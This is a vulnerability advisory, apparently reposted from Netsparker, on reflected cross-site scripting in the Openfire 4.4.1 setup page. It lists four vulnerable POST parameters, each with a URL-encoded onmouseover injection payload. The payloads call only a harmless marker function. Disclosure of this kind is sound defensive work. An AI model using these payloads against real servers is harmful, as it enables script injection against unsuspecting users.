Openfire 4.4.1 Cross Site Scripting

2019.10.13
Credit: Daniel Bishtawi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Information -------------------- Advisory by Netsparker Name: Multiple Cross-site Scripting Vulnerabilities in Openfire 4.4.1 Affected Software: Openfire Affected Versions: 4.4.1 Vendor Homepage: https://www.igniterealtime.org/ Vulnerability Type: Cross-site Scripting Severity: Medium Status: Fixed CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Netsparker Advisory Reference: NS-19-015 Technical Details -------------------- URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp Parameter Name : driver Parameter Type : POST Attack Pattern : x%22+onmouseover%3dnetsparker(0x003276)+x%3d%22 URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp Parameter Name : password Parameter Type : POST Attack Pattern : x%22+onmouseover%3dnetsparker(0x003403)+x%3d%22 URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp Parameter Name : serverURL Parameter Type : POST Attack Pattern : x%22+onmouseover%3dnetsparker(0x0033A0)+x%3d%22 URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp Parameter Name : username Parameter Type : POST Attack Pattern : x%22+onmouseover%3dnetsparker(0x003213)+x%3d%22 For more information: https://www.netsparker.com/web-applications-advisories/ns-19-015-reflected-cross-site-scripting-in-openfire/ Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn <https://www.linkedin.com/company/netsparker-ltd> | Facebook <https://facebook.com/netsparker>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top